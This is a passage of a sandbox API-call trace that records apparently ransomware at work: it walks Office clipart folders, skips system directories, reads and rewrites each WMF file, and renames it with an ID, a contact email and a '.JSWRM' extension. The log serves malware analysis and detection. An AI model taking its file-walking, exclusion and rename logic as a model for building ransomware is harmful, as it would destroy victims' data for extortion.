returned 12 [0074.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0074.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.753] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8772) returned 1 [0074.753] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2240) returned 0x24c1d0 [0074.753] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2240, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2240, lpOverlapped=0x0) returned 1 [0074.755] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.755] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2240, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2240, lpOverlapped=0x0) returned 1 [0074.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.755] CloseHandle (hObject=0x460) returned 1 [0074.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0074.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0074.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0074.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0074.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0074.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.755] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0074.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.756] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3896, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD19986_.WMF", cAlternateFileName="")) returned 1 [0074.756] lstrcmpiW (lpString1="BD19986_.WMF", lpString2=".") returned 1 [0074.756] lstrcmpiW (lpString1="BD19986_.WMF", lpString2="..") returned 1 [0074.756] lstrcmpiW (lpString1="BD19986_.WMF", lpString2="...") returned 1 [0074.756] lstrcmpiW (lpString1="BD19986_.WMF", lpString2="windows") returned -1 [0074.756] lstrcmpiW (lpString1="BD19986_.WMF", lpString2="recovery") returned -1 [0074.756] lstrcmpiW (lpString1="BD19986_.WMF", lpString2="perflogs") returned -1 [0074.756] lstrcmpiW (lpString1="BD19986_.WMF", lpString2="documents and settings") returned -1 [0074.756] lstrcmpiW (lpString1="BD19986_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.756] lstrcmpiW (lpString1="BD19986_.WMF", lpString2="system volume information") returned -1 [0074.756] lstrcmpiW (lpString1="BD19986_.WMF", lpString2="msocache") returned -1 [0074.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19986_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19986_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD19986_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0074.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19986_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19986_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD19986_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0074.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.757] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14486) returned 1 [0074.757] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3890) returned 0x24c1d0 [0074.757] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3890, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3890, lpOverlapped=0x0) returned 1 [0074.760] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.760] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3890, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3890, lpOverlapped=0x0) returned 1 [0074.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.760] CloseHandle (hObject=0x460) returned 1 [0074.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0074.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0074.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0074.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0074.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0074.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.761] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0074.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.761] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4780, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD19988_.WMF", cAlternateFileName="")) returned 1 [0074.761] lstrcmpiW (lpString1="BD19988_.WMF", lpString2=".") returned 1 [0074.761] lstrcmpiW (lpString1="BD19988_.WMF", lpString2="..") returned 1 [0074.761] lstrcmpiW (lpString1="BD19988_.WMF", lpString2="...") returned 1 [0074.761] lstrcmpiW (lpString1="BD19988_.WMF", lpString2="windows") returned -1 [0074.761] lstrcmpiW (lpString1="BD19988_.WMF", lpString2="recovery") returned -1 [0074.761] lstrcmpiW (lpString1="BD19988_.WMF", lpString2="perflogs") returned -1 [0074.761] lstrcmpiW (lpString1="BD19988_.WMF", lpString2="documents and settings") returned -1 [0074.761] lstrcmpiW (lpString1="BD19988_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.761] lstrcmpiW (lpString1="BD19988_.WMF", lpString2="system volume information") returned -1 [0074.761] lstrcmpiW (lpString1="BD19988_.WMF", lpString2="msocache") returned -1 [0074.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0074.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19988_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19988_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD19988_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0074.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19988_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19988_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD19988_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.762] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18304) returned 1 [0074.762] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4780) returned 0x24c1d0 [0074.762] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x4780, lpOverlapped=0x0) returned 1 [0074.764] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.764] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x4780, lpOverlapped=0x0) returned 1 [0074.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.765] CloseHandle (hObject=0x460) returned 1 [0074.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0074.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0074.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0074.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0074.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0074.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.765] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0074.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.768] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b32, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD20013_.WMF", cAlternateFileName="")) returned 1 [0074.768] lstrcmpiW (lpString1="BD20013_.WMF", lpString2=".") returned 1 [0074.768] lstrcmpiW (lpString1="BD20013_.WMF", lpString2="..") returned 1 [0074.768] lstrcmpiW (lpString1="BD20013_.WMF", lpString2="...") returned 1 [0074.768] lstrcmpiW (lpString1="BD20013_.WMF", lpString2="windows") returned -1 [0074.769] lstrcmpiW (lpString1="BD20013_.WMF", lpString2="recovery") returned -1 [0074.769] lstrcmpiW (lpString1="BD20013_.WMF", lpString2="perflogs") returned -1 [0074.769] lstrcmpiW (lpString1="BD20013_.WMF", lpString2="documents and settings") returned -1 [0074.769] lstrcmpiW (lpString1="BD20013_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.769] lstrcmpiW (lpString1="BD20013_.WMF", lpString2="system volume information") returned -1 [0074.769] lstrcmpiW (lpString1="BD20013_.WMF", lpString2="msocache") returned -1 [0074.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0074.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD20013_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD20013_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD20013_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0074.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0074.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD20013_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD20013_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD20013_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0074.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.770] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11058) returned 1 [0074.770] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b30) returned 0x24c1d0 [0074.770] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2b30, lpOverlapped=0x0) returned 1 [0074.772] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, 